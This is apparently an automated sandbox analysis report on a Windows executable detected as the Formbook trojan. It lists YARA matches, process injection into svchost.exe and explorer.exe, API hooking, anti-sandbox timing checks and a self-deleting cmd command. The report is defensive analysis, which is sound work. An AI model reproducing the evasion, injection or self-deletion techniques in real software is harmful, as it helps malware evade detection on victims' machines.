          Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: janacourse2.1.exe PID: 7340, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 7356, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: explorer.exe PID: 7428, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@8/2
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_010237B5 GetLastError,FormatMessageW,0_2_010237B5
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_010110BF AdjustTokenPrivileges,CloseHandle,0_2_010110BF
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_010116C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_010116C3
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_010251CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_010251CD
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0103A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0103A67C
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0102648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0102648E
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FB42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00FB42A2
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
          Source: C:\Users\user\Desktop\janacourse2.1.exeFile created: C:\Users\user\AppData\Local\Temp\leucoryxJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: janacourse2.1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\janacourse2.1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: janacourse2.1.exeVirustotal: Detection: 31%
          Source: explorer.exeString found in binary or memory: /LOADSAVEDWINDOWS
          Source: explorer.exeString found in binary or memory: accent-startColor
          Source: explorer.exeString found in binary or memory: accent-startColorMenu
          Source: explorer.exeString found in binary or memory: themes-installTheme
          Source: explorer.exeString found in binary or memory: Microsoft-Windows-Shell-Launcher
          Source: explorer.exeString found in binary or memory: api-ms-win-stateseparation-helpers-l1-1-0.dll
          Source: unknownProcess created: C:\Users\user\Desktop\janacourse2.1.exe "C:\Users\user\Desktop\janacourse2.1.exe"
          Source: C:\Users\user\Desktop\janacourse2.1.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\janacourse2.1.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\janacourse2.1.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\janacourse2.1.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\janacourse2.1.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\janacourse2.1.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\janacourse2.1.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\janacourse2.1.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\janacourse2.1.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\janacourse2.1.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\janacourse2.1.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\janacourse2.1.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\janacourse2.1.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\janacourse2.1.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\janacourse2.1.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32Jump to behavior
          Source: janacourse2.1.exeStatic file information: File size 1796096 > 1048576
          Source: janacourse2.1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: janacourse2.1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: janacourse2.1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: janacourse2.1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: janacourse2.1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: janacourse2.1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: janacourse2.1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: explorer.pdbUGP source: svchost.exe, 00000001.00000003.1706279740.0000000005400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1706921382.0000000005900000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2892144849.0000000000480000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: janacourse2.1.exe, 00000000.00000003.1649968191.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, janacourse2.1.exe, 00000000.00000003.1650076305.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1651592410.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1653270272.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1708032120.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1708032120.0000000003400000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1709728858.00000000048FF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2894614878.0000000004AB0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2894614878.0000000004C4E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1708153894.0000000004713000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: janacourse2.1.exe, 00000000.00000003.1649968191.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, janacourse2.1.exe, 00000000.00000003.1650076305.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1651592410.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1653270272.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1708032120.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1708032120.0000000003400000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000003.00000003.1709728858.00000000048FF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2894614878.0000000004AB0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2894614878.0000000004C4E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1708153894.0000000004713000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: explorer.pdb source: svchost.exe, 00000001.00000003.1706279740.0000000005400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1706921382.0000000005900000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2892144849.0000000000480000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000002.00000002.2903104637.0000000010F9F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2893942362.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2895259172.0000000004FFF000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000002.00000002.2903104637.0000000010F9F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2893942362.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2895259172.0000000004FFF000.00000004.10000000.00040000.00000000.sdmp
          Source: janacourse2.1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: janacourse2.1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: janacourse2.1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: janacourse2.1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: janacourse2.1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FB42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FB42DE
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FD0A76 push ecx; ret 0_2_00FD0A89
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417933 push esi; ret 1_2_00417934
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041E9AD push dword ptr [D2425A3Fh]; ret 1_2_0041E9CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416B48 push ebp; retf 1_2_00416B63
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409BA9 push ecx; ret 1_2_00409BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409BA9 push ecx; ret 1_2_00409BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041D4D2 push eax; ret 1_2_0041D4D8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041D4DB push eax; ret 1_2_0041D542
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041D485 push eax; ret 1_2_0041D4D8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417D70 push ebx; ret 1_2_00417D7D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041D53C push eax; ret 1_2_0041D542
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417D9A push ebx; ret 1_2_00417D7D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0340225F pushad ; ret 1_2_034027F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034027FA pushad ; ret 1_2_034027F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034309AD push ecx; mov dword ptr [esp], ecx1_2_034309B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0340283D push eax; iretd 1_2_03402858
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0340135E push eax; iretd 1_2_03401369
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DEB02 push esp; retn 0000h1_2_032DEB03
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DEB1E push esp; retn 0000h1_2_032DEB1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE9B5 push esp; retn 0000h1_2_032DEAE7
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5BCB1E push esp; retn 0000h2_2_0E5BCB1F
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5BCB02 push esp; retn 0000h2_2_0E5BCB03
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5BC9B5 push esp; retn 0000h2_2_0E5BCAE7
          Source: C:\Windows\explorer.exeCode function: 2_2_10CFD9B5 push esp; retn 0000h2_2_10CFDAE7
          Source: C:\Windows\explorer.exeCode function: 2_2_10CFDB02 push esp; retn 0000h2_2_10CFDB03
          Source: C:\Windows\explorer.exeCode function: 2_2_10CFDB1E push esp; retn 0000h2_2_10CFDB1F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AB27FA pushad ; ret 3_2_04AB27F9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AB225F pushad ; ret 3_2_04AB27F9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AB283D push eax; iretd 3_2_04AB2858
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AE09AD push ecx; mov dword ptr [esp], ecx3_2_04AE09B6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029ED485 push eax; ret 3_2_029ED4D8

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE2
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FCF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00FCF98E
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_01041C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_01041C41
          Source: C:\Users\user\Desktop\janacourse2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\janacourse2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\janacourse2.1.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-95580
          Source: C:\Users\user\Desktop\janacourse2.1.exeAPI/Special instruction interceptor: Address: 14DBC2C
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 29D9904 second address: 29D990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 29D9B7E second address: 29D9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409AB0 rdtsc 1_2_00409AB0
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 5576Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4366Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 888Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 9784Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\janacourse2.1.exeAPI coverage: 3.5 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 2.0 %
          Source: C:\Windows\SysWOW64\explorer.exeAPI coverage: 2.2 %
          Source: C:\Windows\explorer.exe TID: 7660Thread sleep count: 5576 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7660Thread sleep time: -11152000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 7660Thread sleep count: 4366 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7660Thread sleep time: -8732000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 7524Thread sleep count: 186 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 7524Thread sleep time: -372000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 7524Thread sleep count: 9784 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 7524Thread sleep time: -19568000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0102698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0102698F
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_010268EE FindFirstFileW,FindClose,0_2_010268EE
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0101D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0101D076
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0101D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0101D3A9
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0102979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0102979D
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_01029642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_01029642
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_01029B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_01029B2B
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0101DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0101DBBE
